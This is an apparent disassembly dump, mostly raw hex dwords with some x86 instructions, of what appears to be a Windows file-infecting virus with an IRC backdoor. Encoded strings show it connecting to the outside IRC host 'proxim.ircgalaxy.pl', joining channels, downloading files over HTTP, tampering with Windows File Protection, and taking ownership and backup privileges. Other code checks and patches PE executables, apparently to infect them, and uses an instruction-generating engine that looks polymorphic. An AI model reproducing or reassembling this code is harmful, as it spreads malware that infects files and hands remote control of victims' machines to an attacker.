0FFFFFF1Ah, 3F02858Bh, 8F8D0010h, 296Ah, 0FFFF09E8h dd 6858BFFh, 8500103Fh, 8D2074C0h, 29778Fh, 0FEF4E800h dd 858BFFFFh, 103F0Eh, 0B74C085h, 29848F8Dh, 0DFE80000h dd 8BFFFFFEh, 55C35FC7h, 0E8h, 0ED815D00h, 101B24h, 858DC933h dd 101EAFh, 51515451h, 0FF515150h, 103E8E95h, 24048700h dd 3E6295FFh, 0C25D0010h, 0E8550004h, 0 dd 53ED815Dh, 6A00101Bh, 1E958DFFh, 5000101Bh, 2420CD52h dd 83002A00h, 0C7660CC4h, 101B6485h, 0C720CD00h, 101B6685h dd 2A002400h, 6AC35D00h, 9E8581Ah, 8D000000h, 0FEAA6142h dd 0C3F075C9h, 3F7C9569h, 84050010h, 89420808h, 103F7C95h dd 0C3E2F700h, 0E855h, 815D0000h, 101BADEDh, 809D8B00h dd 8300103Fh, 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h dd 95FF0000h, 103EB6h, 848DFC8Bh, 10424h, 6A5000h, 4E8h dd 52525600h, 95FF5700h, 103EB2h, 978DC933h, 104h, 26A5151h dd 68016A51h, 40000000h, 7E95FF52h, 9600103Eh, 5B74F685h dd 4685450h, 57000001h, 2024B4FFh, 0FF000002h, 103F5E95h dd 0C0855900h, 14E31674h, 6AD48B50h, 57515200h, 0F695FF56h dd 5900103Eh, 0D075C085h, 6295FF56h, 8D00103Eh, 57524457h dd 8D58446Ah, 10497h, 0C033AB00h, 0F359106Ah, 505050ABh dd 50505050h, 8695FF52h, 8100103Eh, 208C4h, 2474FF00h dd 4E95FF08h, 5300103Fh, 3F4E95FFh, 0C25D0010h, 3E800004h dd 4601750Ah, 158C8D8Bh, 19E30010h, 1000958Dh, 0D1030010h dd 84D2FF56h, 1F880FC0h, 0F000001h, 11084h, 3A3E8000h dd 80461075h, 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h dd 0CF8B4275h, 4F0146C6h, 6A51CE2Bh, 53565100h, 3F4695FFh dd 3B590010h, 0DF850FC1h, 8D000000h, 101EA385h, 68006A00h dd 0Ch, 95FF5350h, 103F46h, 0C3Dh, 0BF850F00h, 0E9000000h dd 0B1h, 52503E81h, 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch dd 99h, 0F375203Ch, 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h dd 74656721h, 3CAC7F75h, 817C7520h, 6820FF7Eh, 71757474h dd 70037E81h, 752F2F3Ah, 0FF47C668h, 0BA310F00h, 2710h dd 0FF52E2F7h, 103EE695h, 50C03300h, 0E8505050h, 9, 6E776F44h dd 64616F6Ch, 5695FF00h, 8500103Fh, 333674C0h, 808589C9h dd 5100103Fh, 20068h, 56515180h, 5A95FF50h, 8D00103Fh dd 101BA795h, 0C9335000h, 52505154h, 95FF5151h, 103E8Eh dd 
0FF240487h, 103E6295h, 80C3F800h, 10157F8Dh, 0C3F90100h dd 16A016Ah, 73FF33FFh, 8515FF04h, 335A74C0h, 0B3D08BDBh dd 3C50030Bh, 1DCBB58Dh, 0BA8B0010h, 10Ch, 1088A8Bh, 0F8030000h dd 8B60CB2Bh, 61A6F3CBh, 0E2470574h, 832EEBF5h, 8B530FC7h dd 0D48B57CCh, 406A5450h, 0FF6A5251h, 3F2295FFh, 8D8B0010h dd 103E96h, 2B0CC483h, 7E983CFh, 6A07C7h, 4F8900E8h, 4F53C303h dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh dd 50000002h, 0D08F7255h, 786F7270h, 692E6D69h, 61676372h dd 7978616Ch, 6C702Eh, 4B43494Eh, 636D6F20h, 6376726Dh dd 53550A69h, 63205245h, 4E494F4Ah, 69762620h, 0A757472h dd 0E855h, 815D0000h, 101EB5EDh, 7F85C600h, 1015h, 3EBA95FFh dd 0E8C10010h, 6A3C741Fh, 72B58B1Eh, 5900103Eh, 752E3CACh dd 3E81662Ah, 23751DFFh, 3F76BD8Dh, 768B0010h, 66A55702h dd 0EC858DA5h, 8F001038h, 10391285h, 4689FA00h, 0FE4E8CFAh dd 0E201B1FBh, 0E850EBCFh, 0FFFFFB21h, 8247C83h, 0E8447504h dd 8, 2E434653h, 4C4C44h, 3EC695FFh, 0C00B0010h, 6A930D74h dd 95FF5302h, 103E6Eh, 0E893D0FFh, 0FFFFFE97h, 0BE8h, 43465300h dd 2E534F5Fh, 4C4C44h, 3EC695FFh, 7CE80010h, 0E8FFFFFEh dd 0FFFFF600h, 12D48DFFh, 0C9330010h, 4324858Dh, 51510010h dd 51505151h, 95FF5151h, 103EC2h, 0BE8h, 45535500h, 2E323352h dd 4C4C44h, 3EC695FFh, 0AE80010h, 77000000h, 69727073h dd 4166746Eh, 95FF5000h, 103E6Eh, 3E768589h, 310F0010h dd 19858D8Dh, 85890010h, 103F7Ch, 0C695FF51h, 9300103Eh dd 468h, 92B58D00h, 59001019h, 3F62BD8Dh, 0C2E80010h, 66FFFFF5h dd 1E7585C7h, 50000010h, 1E77A583h, 8D000010h, 101E3595h dd 6A545000h, 52006A01h, 268h, 6695FF80h, 8500103Fh, 22755AC0h dd 1E688D8Dh, 6A520010h, 75B58D06h, 5400101Eh, 51505056h dd 6A95FF52h, 5800103Fh, 3F6295FFh, 85C60010h, 104183h dd 0CE800h, 53570000h, 334B434Fh, 4C442E32h, 95FF004Ch dd 103EC6h, 76893h, 0B58D0000h, 1018E9h, 32BD8D59h, 0E800103Fh dd 0FFFFF53Dh, 0CE8h, 4E495700h, 54454E49h, 4C4C442Eh dd 0C695FF00h, 8500103Eh, 35840FC0h, 93000002h, 568h, 27B58D00h dd 
59001019h, 3F4EBD8Dh, 6E80010h, 83FFFFF5h, 103F52BDh dd 840F0000h, 210h, 190EC81h, 68540000h, 101h, 3F3295FFh dd 0C4810010h, 190h, 6AD48B50h, 95FF5200h, 103F52h, 7559C085h dd 1388680Dh, 95FF0000h, 103EE6h, 0BD83E2EBh, 101E77h dd 8D297500h, 101E7B85h, 95FF5000h, 103F3Eh, 840FC085h dd 189h, 8B0C408Bh, 8F30FF00h, 101E7785h, 8385C600h, 1001041h dd 16A006Ah, 95FF026Ah, 103F4Ah, 0FFFF883h, 16084h, 958D9300h dd 101E73h, 5352106Ah, 3F3A95FFh, 0C0850010h, 140850Fh dd 0BD8D0000h, 101E94h, 3CE808B1h, 68FFFFFAh, 94h, 89E62B5Eh dd 0FF542434h, 103EBE95h, 0A2BD8D00h, 0B100101Eh, 0FA1DE801h dd 958DFFFFh, 101E8Fh, 1468006Ah, 52000000h, 4695FF53h dd 8D00103Fh, 8D142444h, 10432495h, 0B60F5000h, 24448B0Ah dd 8E0C114h, 12014A02h, 4A12024Ah, 24440B03h, 0FE18008h dd 5108E0C1h, 1024440Bh, 8D5032FFh, 103F84BDh, 1CE800h dd 2E250000h, 2E207836h, 3A202E20h, 2E252525h, 78257838h dd 0A732520h, 4E494F4Ah, 0FF570020h, 103E7695h, 0ACC48100h dd 6A000000h, 53575000h, 3F4695FFh, 8D8B0010h, 101598h dd 1BE3006Ah, 510DC96Bh, 5E8h, 64252600h, 0FF57000Ah, 103E7695h dd 0CC48300h, 680BEB50h, 7, 1EA8BD8Dh, 53570010h, 3F4695FFh dd 0C0850010h, 0B58D547Eh, 103F84h, 1598A583h, 8D000010h dd 1041838Dh, 6ACE2B00h, 53565100h, 3F4295FFh, 0F8830010h dd 912F7E00h, 0B58DFE8Bh, 103F84h, 0AEF20DB0h, 0E8601075h dd 0FFFFFA2Ah, 0E3177261h, 1778D09h, 0CF8BEAEBh, 0BD8DCE2Bh dd 103F84h, 0F787A4F3h, 0FF53B9EBh, 103F3695h, 7FBD8000h dd 1001015h, 30682A74h, 0FF000075h, 103EE695h, 83BD8000h dd 1041h, 85C71174h, 101E77h, 0 dd 418385C6h, 0E9000010h, 0FFFFFE08h, 158885C7h, 10h, 0C25D8000h dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 
0D3A7469h dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h dd 49202165h, 20732774h, 6574616Ch, 0A2A1A821h, 0A614294Ch dd 90878810h, 3752488Fh, 0E1519440h, 0B1FAE586h, 6CCC5C27h dd 375232C2h, 8000B940h, 0B8B35265h, 68988FD8h, 0C7h, 14h dup(0) dd 0A5836000h, 1042F4h, 0F8A58300h, 1042h, 1443B70Fh, 0F18538Dh dd 3064BB7h, 24448BD0h, 0C422B24h, 423B1972h, 8B147308h dd 422B1442h, 0F495890Ch, 89001042h, 1042F885h, 8305EB00h dd 0D9E228C2h, 4C261h, 24678588h, 64E80010h, 68000000h dd 20h, 2394858Dh, 39590010h, 830C7418h, 0F7E204C0h, 42D085FFh dd 0F7C30010h, 678D03D9h, 0E3001024h, 0FC70FF10h, 0E883008Fh dd 89F6E204h, 1023949Dh, 3A8300h, 322B0574h, 8D107203h dd 5B58FC4Eh, 3A835Eh, 32FF0474h, 72FF03EBh, 0FF57E810h dd 0CE2BFFFFh, 42F88D2Bh, 3580010h, 8FC3344Bh, 1042D485h dd 0D085C700h, 1042h, 0E8000000h, 3Ch, 42D0858Bh, 0A9E80010h dd 0E8FFFFF6h, 18h, 42D0BD83h, 75000010h, 109D8908h, 0EB001024h dd 0D08DFF9Ch, 0C3001042h, 42D4858Fh, 95890010h, 1042D0h dd 3E8h, 0C3C93300h, 80938Bh, 0E8520000h, 0FFFFFEEDh, 42F89503h dd 0D6030010h, 0C7A83h, 107840Fh, 7A830000h, 840F0010h dd 0FDh, 500C428Bh, 0FFFEC8E8h, 0F88503FFh, 3001042h, 88A50C6h dd 7400F980h, 2EF98019h, 0EB400374h, 1488BF1h, 0DFDFE181h dd 0F981DFDFh, 4C4C44h, 2B59EC75h, 0FAF983C8h, 0B78F0Fh dd 81660000h, 3233FE78h, 0AB850Fh, 83560000h, 575003Ah dd 0EB104A8Bh, 30A8B02h, 72E851F1h, 3FFFFFEh, 1042F8B5h dd 0C085AD00h, 840FFB78h, 84h, 42F8B5FFh, 0E8500010h, 0FFFFFE55h dd 42F88503h, 858F0010h, 1042F8h, 53240403h, 3302C083h dd 8B60FDBh, 0C98012E3h, 24C15320h, 1C290424h, 240C2924h dd 0E9EB405Bh, 0D70FFB81h, 3E74DDBBh, 45A8FB81h, 3674DB6Eh dd 3B59FB81h, 2E74FFA1h, 22D6FB81h, 2674ACB5h, 0E993FB81h dd 1E74F358h, 0E97DFB81h, 1674F358h, 3F46FB81h, 0E74E125h dd 3F30FB81h, 674E125h, 42D495FFh, 0E95B0010h, 0FFFFFF71h dd 14C2835Eh, 0FFFEEFE9h, 6A01C3FFh, 49E85804h, 88FFFFF5h dd 10264195h, 31B86600h, 0C0E20218h, 0E20203E4h, 66AAB66h dd 0F52EE858h, 0C283FFFFh, 6AD18708h, 21E85805h, 
80FFFFF5h dd 0B7303FAh, 850250B0h, 102641h, 6A27EBAAh, 80AA5868h dd 187503FAh, 1E811B0h, 0B8FFFFF5h, 1, 0D74D284h, 0CAFEE0D1h dd 5EBF6EBh, 0B8h, 0BFE2AB80h, 0CC958DC3h, 2B001039h, 0C3DAF7D7h dd 39C085F7h, 10h, 950F1000h, 0BE0C1C0h, 39BE85F6h, 75010010h dd 890D6606h, 0F613EB25h, 1039BE85h, 6750200h, 25310D66h dd 0D6604EBh, 0AB662501h, 0FFFFBCE8h, 34438BFFh, 42E89589h dd 0C3AB0010h, 39C085F7h, 10h, 950F1000h, 0AABC04C0h, 0FFFF9CE8h dd 0EC9589FFh, 0F6001042h, 1039BE85h, 4750100h, 2EB310Fh dd 0C3ABC02Bh, 39C085F7h, 10h, 27741000h, 39BA858Ah, 0E0C10010h dd 8B0D660Bh, 0B0AB6645h, 858AAAF8h, 1039BAh, 51BE0C1h dd 6896467h, 66C033ABh, 0B812EBABh, 58F64h, 0BA858AABh dd 4001039h, 18E0C158h, 85C6C3ABh, 10279Ch, 0B025EB09h dd 6620EBFCh, 6600EBB8h, 6A19EBABh, 9E85804h, 8DFFFFF4h dd 0E0C1D204h, 89056608h, 0EBAB66C0h, 0AA90B003h, 0E858156Ah dd 0FFFFF3F0h, 279C8580h, 80060010h, 2F7308FAh, 0C374D284h dd 0C374CAFEh, 0C774CAFEh, 0D974CAFEh, 0C74CAFEh, 2 dup(0F74CAFEh) dd 0CBEBF9B0h, 0B0AA87B0h, 0B0C4EBDBh, 0B0C0EBF5h, 0C3BCEBF8h dd 39C085F7h, 20000010h, 86B00000h, 4040275h, 8AFE4F8Dh dd 1039B8A5h, 80AB6600h, 77505FCh, 4F8000B0h, 0E8AA40FFh dd 0FFFFFF62h, 39C085F7h, 40000010h, 0B8660000h, 2753166h dd 0AB6629B4h, 850A18B0h, 1039BAh, 0AA03E0C0h, 0FFFF3DE8h dd 0F788B0FFh, 1039C085h, 800000h, 0B0027500h, 0B8A58A86h dd 66001039h, 5FC80ABh, 0B00775h, 40FF4F80h, 0BD8DC3AAh dd 1039CCh, 0FFFF0DE8h, 0C085F7FFh, 1039h, 74004000h, 0AA60B003h dd 39C085F7h, 10h, 7741000h db 0B8h ; --------------------------------------------------------------------------- push ebp mov ebp, esp add [ebx-3F7A08B1h], ch cmp [eax], edx add [ebx], al ; --------------------------------------------------------------------------- dw 0 dd 0F0840F02h, 0B0000000h, 89ABAAE8h, 1042D8BDh, 0FECCE800h dd 0E8B0FFFFh, 0BD89ABAAh, 1042DCh, 0FFFEBDE8h, 0C085F7FFh dd 3001039h, 74000000h, 0C085F71Ah, 1039h, 74020000h, 0FE2EE80Ah dd 9BE8FFFFh, 0B0FFFFFEh, 8BABAAE9h, 1042D885h, 2BCF8B00h dd 0E0BD89C8h, 89001042h, 67B8FC48h, 0AB36FF64h, 
0AB66C033h dd 39C085F7h, 30010h, 13740000h, 39BE85F6h, 74800010h dd 0FDAAE80Ah, 5BE8FFFFh, 0B8FFFFFEh, 26896467h, 66C033ABh dd 0C085F7ABh, 3001039h, 74000000h, 0BE85F65Ah, 80001039h dd 81E80A75h, 0E8FFFFFDh, 0FFFFFE32h, 0FFFD02E8h, 0E820B0FFh dd 0FFFFFB14h, 0B86639E3h, 0AB6615FFh, 958BAB91h, 1039C0h dd 0C2F7D2F7h, 3, 0DCE81475h, 0B0FFFFFCh, 0FAEEE81Fh, 0B866FFFFh dd 0AB6615FFh, 0CF8BAB91h, 42E0858Bh, 0C82B0010h, 0F7FC4889h dd 1039C085h, 300h, 0F7387400h, 1039C085h, 0 dd 0F72C740Ch, 1039C085h, 0 dd 0E80A7502h, 0FFFFFDC2h, 0FFFD4BE8h, 0C085F7FFh, 1039h dd 74080000h, 0FDACE80Ah, 61E8FFFFh, 0F7FFFFFDh, 1039C085h dd 400h, 0E8177400h, 0FFFFFD96h, 0FEC029B8h, 8B8ABC8h dd 0AB0474C0h, 0EBF875B8h, 7FE8AB67h, 0F7FFFFFDh, 1039C085h dd 800h, 80727500h, 1039BEBDh, 69740000h, 0FFFD65E8h, 1829B8FFh dd 0A50AC929h, 1039BAh, 0A03E4C0h, 1039BAA5h, 4BE8AB00h dd 0B0FFFFFDh, 858AAAB1h, 1039BEh, 0FD3CE8AAh, 0B60FFFFFh dd 1039BA85h, 0C0048D00h, 0E0C14004h, 668DB008h, 0AA01B0ABh dd 0FD20E857h, 3C29FFFFh, 0E2B86624h, 85F759FBh, 1039C0h dd 10h, 49B00774h, 75B866AAh, 66E102FAh, 0FCFCE8ABh, 0E8B0FFFFh dd 0ABC033AAh, 42C4BD89h, 85F70010h, 1039C0h, 20h, 0E8573B75h dd 0FFFFFCDEh, 39C085F7h, 10h, 18748000h, 42F0BD89h, 39E80010h dd 0E8FFFFFDh, 0FFFFFCC2h, 0E8AAC3B0h, 0FFFFFCBAh, 0B0CF8B5Ah dd 0ACA2B58h, 1039B885h, 0FC4A8900h, 0FCA4E8AAh, 0B866FFFFh dd 85F7C081h, 1039C0h, 40h, 0C4800374h, 0B8A50A28h, 66001039h dd 0C8BD89ABh, 0AB001042h, 39C085F7h, 10h, 9754000h, 850250B0h dd 1039B8h, 0C085F7AAh, 80001039h, 75000000h, 0AB8B00Bh dd 1039B985h, 3DEBAA00h, 1831B866h, 39C085F7h, 1000010h dd 2740000h, 0A50A29B0h, 1039B9h, 0A03E4C0h, 1039B9A5h dd 66AB6600h, 0F7F081B8h, 1039C085h, 20000h, 0B4027500h dd 0B9A50AC8h, 66001039h, 0E4BD89ABh, 0B8001042h, 29CCh dd 0C085F7ABh, 8001039h, 74000000h, 0FBFCE871h, 85F7FFFFh dd 1039C0h, 400h, 0B8B00B75h, 39BA850Ah, 0EBAA0010h, 0C085F74Dh dd 1039h, 75000008h, 83B86611h, 0BAA50AE0h, 66001039h dd 0AAC033ABh, 0B86615EBh, 0A50A1829h, 1039BAh, 0A03E4C0h dd 1039BAA5h, 0F7AB6600h, 
1039C085h, 100000h, 81B86600h dd 800374C0h, 0A50A08C4h, 1039BAh, 0B60FAB66h, 1039BE85h dd 8BE8AB00h, 0F7FFFFFBh, 1039C085h, 0 dd 0B00E7440h, 0B8850250h, 0AA001039h, 0FFFB71E8h, 0FE4F8DFFh dd 42CC8D89h, 85F70010h, 1039C0h, 80000000h, 0E8B01774h dd 0F0858BAAh, 2B001042h, 4E883C7h, 0F0BD89ABh, 0EB001042h dd 0FBB2E805h, 3BE8FFFFh, 0F7FFFFFBh, 1039C085h, 1000000h dd 0B00B7500h, 0B8850A40h, 0AA001039h, 0B8660FEBh, 0A50AC083h dd 1039B8h, 1B0AB66h, 0C085F7AAh, 1039h, 75000200h, 0C085F72Fh dd 1039h, 75000400h, 0AC0B01Ah, 1039BA85h, 0BFA58A00h dd 0C1001039h, 0B86610E0h, 0B0AB8166h, 0B008EB00h, 0BA850A40h dd 0AA001039h, 39C085F7h, 10h, 10750008h, 0E883B866h, 39B9A50Ah dd 0AB660010h, 8EB01B0h, 850A48B0h, 1039B9h, 0FAB0E8AAh dd 85F7FFFFh, 1039C0h, 100000h, 257575B1h, 0F883B866h dd 39B9A50Ah, 0AB660010h, 29AAC033h, 1042CCBDh, 0C085F700h dd 1039h, 75002000h, 0EB77B11Fh, 9B8661Bh, 0B9A50A18h dd 0C0001039h, 0A50A03E4h, 1039B9h, 0BD29AB66h, 1042CCh dd 0A58AC18Ah, 1042CCh, 58B0AB66h, 39B88502h, 0E8AA0010h dd 0FFFFFA4Ah, 39C085F7h, 30010h, 2C740200h, 39C085F7h dd 10h, 20750800h, 39C085F7h, 10h, 0A750600h, 0FFF9AFE8h dd 0FA1CE8FFh, 0D1E8FFFFh, 0E8FFFFF9h, 0FFFFFA12h, 39C085F7h dd 10h, 8741000h, 0E8AAC9B0h, 0FFFFF9FEh, 39C085F7h, 10h dd 2A740040h, 852A07B0h, 1039B8h, 0D1AE0C1h, 240889h, 39B8A502h dd 0E4C00010h, 4C48003h, 0F9D0E8ABh, 61B0FFFFh, 0F9C8E8AAh dd 0B866FFFFh, 0A50AE0FFh, 1039B8h, 0B7E8AB66h, 0F7FFFFF9h dd 1039C085h, 2000h, 0F76F7400h, 1039C085h, 0 dd 8B1F7480h, 0F08D8BC7h, 2B001042h, 0FC4189C1h, 0FFF9FFE8h dd 0F988E8FFh, 0C3B0FFFFh, 0F980E8AAh, 0C78BFFFFh, 42C48D8Bh dd 0C12B0010h, 0B0FC4189h, 0B8850A58h, 0AA001039h, 0FFF965E8h dd 0C085F7FFh, 1039h, 74008000h, 50B8660Ch, 0B8850AC3h dd 0EB001039h, 0FFB8660Ah, 0B8A50AE0h, 66001039h, 0F93CE8ABh dd 85F7FFFFh, 1039C0h, 2000003h, 0CF8B5F74h, 42DC858Bh dd 0C82B0010h, 33FC4889h, 0C085F7C9h, 1039h, 75010000h dd 0B8858D0Eh, 8A001039h, 0F9804008h, 8DF87303h, 2444CD04h dd 0E0C10010h, 0AB8BB008h, 0B86606E3h, 0AB66C031h, 808FB866h dd 0B868h, 
66E10200h, 85AB58ABh, 660675C9h, 66C031B8h dd 0AAC3B0ABh, 0FFF8D1E8h, 0CC858DFFh, 0F7001039h, 1039C085h dd 0 ; --------------------------------------------------------------------------- and [ebp+6], dh push edi sub edi, eax pop eax jmp short loc_3100AFC2 ; --------------------------------------------------------------------------- mov edx, [ebx+28h] sub edi, eax sub edx, eax mov ecx, [ebp+1042E4h] add [ebp+1042C4h], edx add [ecx], edi mov eax, [esp+4] loc_3100AFC2: ; CODE XREF: UPX2:3100AFA7j mov [ebp+101069h], edi mov edi, [ebp+1042C8h] sub eax, [ebp+1042C4h] test dword ptr [ebp+1039C0h], 40h jz short loc_3100AFE2 neg eax loc_3100AFE2: ; CODE XREF: UPX2:3100AFDEj stosd retn 4 ; --------------------------------------------------------------------------- dw 5756h dd 4300BD83h, 0F000010h, 1D984h, 0DE800h, 454B0000h, 4C454E52h dd 442E3233h, 0FF004C4Ch, 103EAE95h, 14858900h, 53001043h dd 33C588Bh, 2873FFD8h, 0E834438Bh, 0FFFFF4E5h, 42F4958Bh dd 35B0010h, 85890C42h, 104318h, 89084203h, 10431C85h dd 28738B00h, 80B3FFh, 0BEE80000h, 8BFFFFF4h, 1042F4BDh dd 0B2E85600h, 8BFFFFF4h, 1042F495h, 84A8B00h, 2B0C4A03h dd 5E983CEh, 160880Fh, 840F0000h, 15Ah, 42F8B503h, 0B5030010h dd 1042B4h, 0FE83CACh, 0A285h, 4468D00h, 42B4852Bh, 6030010h dd 0F46FE850h, 0BD83FFFFh, 1042F4h, 3B0B7500h, 830F0C47h dd 11Bh, 95390CEBh, 1042F4h, 10D850Fh, 85030000h, 1042B4h dd 0FF388166h, 0FC850F25h, 8B000000h, 432B0240h, 32E85034h dd 39FFFFF4h, 1042F4BDh, 0E4850F00h, 3000000h, 1042F885h dd 0B4850300h, 8B001042h, 0C472B00h, 0CD820Fh, 473B0000h dd 0C4830F08h, 83000000h, 470302C0h, 0B4850314h, 52001042h dd 14B5FF50h, 0FF001043h, 103E6E95h, 0C0855A00h, 0B7850Fh dd 9CE90000h, 3C000000h, 94850FFFh, 80000000h, 850F153Eh dd 8Bh, 2B01468Bh, 0E8503443h, 0FFFFF3C1h, 42F4BD39h, 77750010h dd 42F88503h, 85030010h, 1042B4h, 43208589h, 8B0010h, 4318853Bh dd 8720010h, 431C853Bh, 69720010h, 3Dh, 0E8377270h, 1Fh dd 8BFC4E8Dh, 3022BC1h, 853B1042h, 104320h, 0C4830C75h dd 8F31FF10h, 611C2444h, 8FC31BEBh, 1042D485h, 
0B58B6000h dd 1042B4h, 0FFF45FE8h, 0A961FFh, 75800000h, 0C472B0Eh dd 473B0972h, 3C820F08h, 49FFFFFFh, 0FEB2850Fh, 3C8BFFFFh dd 0C0A78124h, 0FF000029h, 0EBFFBFFFh, 244A8142h, 0E0000060h dd 8BC0334Eh, 8587240Ch, 104300h, 42FC8589h, 0B98D0010h dd 29C4h, 42B48503h, 0A5660010h, 0C62B4EA5h, 2B144203h dd 46C60C42h, 81C7E8FBh, 54h, 5, 5FFC4689h, 0FF57C35Eh dd 103EBA95h, 1FE8C100h, 11A850Fh, 54500000h, 0FF6A286Ah dd 3F1A95FFh, 0C0850010h, 5880F5Fh, 0E8000001h, 0FFFFE458h dd 11E8h, 74655300h, 656C6946h, 75636553h, 79746972h, 0B5FF0041h dd 104288h, 3E6E95FFh, 85890010h, 104290h, 19E8h, 54655300h dd 4F656B61h, 72656E77h, 70696873h, 76697250h, 67656C69h dd 0E8570065h, 0FFFFE829h, 13E8h, 52655300h, 6F747365h dd 72506572h, 6C697669h, 656765h, 0E80BE857h, 12E8FFFFh dd 53000000h, 63614265h, 5070756Bh, 69766972h, 6567656Ch dd 0EEE85700h, 0E8FFFFE7h, 18h, 68436553h, 65676E61h, 69746F4Eh dd 72507966h, 6C697669h, 656765h, 0E7CBE857h, 5450FFFFh dd 3DCC858Dh, 646A0010h, 57016A50h, 3F2695FFh, 3C890010h dd 6295FF24h, 2A00103Eh, 84BD8DC0h, 50001041h, 0B5FF5050h dd 103DCCh, 4000168h, 16A5400h, 9095FF57h, 54001042h, 0FF57046Ah dd 10429095h, 14C48300h, 4288B5FFh, 95FF0010h, 103E9Eh dd 0B58DC35Fh, 104184h, 0A295FF56h, 8300103Eh, 840FFFF8h dd 0BBh, 42948589h, 6A0010h, 0DE95FF56h, 8500103Eh, 0A4840FC0h dd 2B000000h, 6A5050C0h, 16A5003h, 68h, 95FF56C0h, 103E7Eh dd 0FFFF883h, 60784h, 98858900h, 8D001042h, 10429C8Dh dd 0A4958D00h, 51001042h, 50006A52h, 3EAA95FFh, 0F8830010h dd 0D5840FFFh, 6A000005h, 98B5FF00h, 0FF001042h, 103EA695h dd 0FFF88300h, 5BE840Fh, 85890000h, 1042ACh, 0C303C933h dd 6A515051h, 0B5FF5104h, 104298h, 3E8295FFh, 0C0850010h dd 59A840Fh, 0C9330000h, 42B08589h, 51510010h, 1F6851h dd 0FF50000Fh, 103ECA95h, 0FC08500h, 55384h, 0B4858900h dd 0C3001042h, 7327B8h, 384B8B00h, 39C085F7h, 10h, 6752000h dd 10698503h, 0D2330010h, 0F1F7C103h, 8589E1F7h, 1042C0h dd 29CBB8h, 3C4B8B00h, 10698503h, 0D2330010h, 0F1F7C103h dd 8589E1F7h, 1042B8h, 4BB70FC3h, 35E3F906h, 0F18538Dh dd 31443B7h, 
0C16B49D0h, 81D00328h, 69775F3Ah, 1D74F96Eh dd 10C7A83h, 4B8BE072h, 14428B3Ch, 8D104203h, 0F7FF4844h dd 3BC123D9h, 1042AC85h, 548BC300h, 0C0331024h, 0B8828Fh dd 8BC30000h, 8D0BEBCFh, 104184BDh, 0DF8BFC00h, 3CACC933h dd 3C067261h, 2C02777Ah, 5C3CAA20h, 2E3CEC74h, 3CDD74h dd 0C9E3E875h, 453D018Bh, 74004558h, 43533D0Bh, 850F0052h dd 0FFFFFF33h, 573D038Bh, 0F434E49h, 0FFFF2684h, 43573DFFh dd 840F4E55h, 0FFFFFF1Bh, 3343573Dh, 10840F32h, 3DFFFFFFh dd 4F545350h, 0FF05840Fh, 0DB33FFFFh, 0FFFE2DE8h, 0E81075FFh dd 0FFFFFCFAh, 0FFFE21E8h, 0EC840FFFh, 33FFFFFEh, 16E8D2h dd 63E80000h, 0E8FFFFFFh, 0 ; --------------------------------------------------------------------------- pop ebp sub ebp, 10344Fh jmp loc_3100B94A ; --------------------------------------------------------------------------- dd 8B32FF64h, 1042B4B5h, 22896400h, 4D3E8166h, 0E3850F5Ah dd 8B000003h, 0DE033C5Eh, 503B8166h, 0D3850F45h, 0F7000003h dd 20001643h, 850F0000h, 3C6h, 25C43F6h, 3BC840Fh, 438B0000h dd 0A0A03D08h, 840FA0A0h, 3AEh, 2020203Dh, 0A3840F20h dd 8B000003h, 0C88Bh, 5116E300h, 0FFEF54E8h, 0F88D03FFh dd 3001042h, 406183CEh, 44618300h, 0FE9BE800h, 820FFFFFh dd 37Ah, 42FCA583h, 8B000010h, 4A8B0842h, 73C12B10h, 0EBC03304h dd 89C80305h, 8589104Ah, 1042BCh, 0B80C4A03h, 10000h, 0E68AE851h dd 9530FFFFh, 1039BEh, 0B53020B1h, 1039BFh, 0C9FE206Ah dd 0E8147858h, 0FFFFE670h, 940FD285h, 31E2D3C2h, 1039C095h dd 0F7E5EB00h, 1039C085h, 0 dd 0F7227402h, 1039C085h, 300h, 810C7500h, 1039C0A5h, 0FFFFFF00h dd 810AEBF7h, 1039C08Dh, 0 dd 66810h, 68590000h, 6, 0E622E858h, 858AFFFFh, 1039B8h dd 0B82A8486h, 88001039h, 1039B885h, 0F7E0E200h, 1039C085h dd 800h, 80097500h, 1039BABDh, 0C5740100h, 39C085F7h, 10h dd 1B741000h, 39B8BD80h, 74050010h, 0B9BD80B0h, 5001039h dd 0BD80A774h, 1039BAh, 0F79E7405h, 1039C085h, 40000000h dd 80097400h, 1039B8BDh, 89770200h, 4300A583h, 0E8000010h dd 0FFFFF272h, 0FFFD43E8h, 271E8FFh, 9D8B0000h, 1042B8h dd 42BC9D03h, 5BE80010h, 0FFFFFFCh, 25184h, 0B4B58B00h dd 8B001042h, 0DE033C5Eh, 0FFFD5CE8h, 
